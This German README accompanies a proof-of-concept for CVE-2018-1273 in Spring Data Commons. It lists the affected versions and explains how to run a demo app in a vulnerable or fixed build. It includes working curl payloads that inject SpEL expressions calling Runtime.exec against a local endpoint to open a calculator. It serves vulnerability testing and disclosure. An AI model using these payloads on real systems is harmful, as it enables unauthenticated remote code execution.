
Proof-of-Concept-Exploit für CVE-2018-1273, eine Spring Data Commons Property Binder-Schwachstelle, die zu Remote-Code-Execution über manipulierte HTTP-Anfrageparameter führt.
Versionen von Spring Data Commons vor 1.13, von 1.13 bis 1.13.10, von 2.0 bis 2.0.5 sowie ältere nicht unterstützte Versionen enthalten eine Schwachstelle im Property Binder, die durch unsachgemäße Neutralisierung spezieller Elemente verursacht wird. Ein nicht authentifizierter entfernter Angreifer kann speziell präparierte Anfrageparameter gegen HTTP-Ressourcen von Spring Data REST senden oder die projektionsbasierte Bindung von Anfrage-Payloads von Spring Data verwenden, was zu einem Remote-Code-Execution-Angriff führen kann.
Weitere Informationen hier
Die Anwendung kann mit der anfälligen Version oder der behobenen Version von Spring Data Commons getestet werden.
mvn spring-boot:run
mvn spring-boot:run -Dfixed
Führen Sie den folgenden Befehl aus, um zu prüfen, ob die Schwachstelle ausgenutzt werden kann:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
Erstellt von https://www.arima.eu
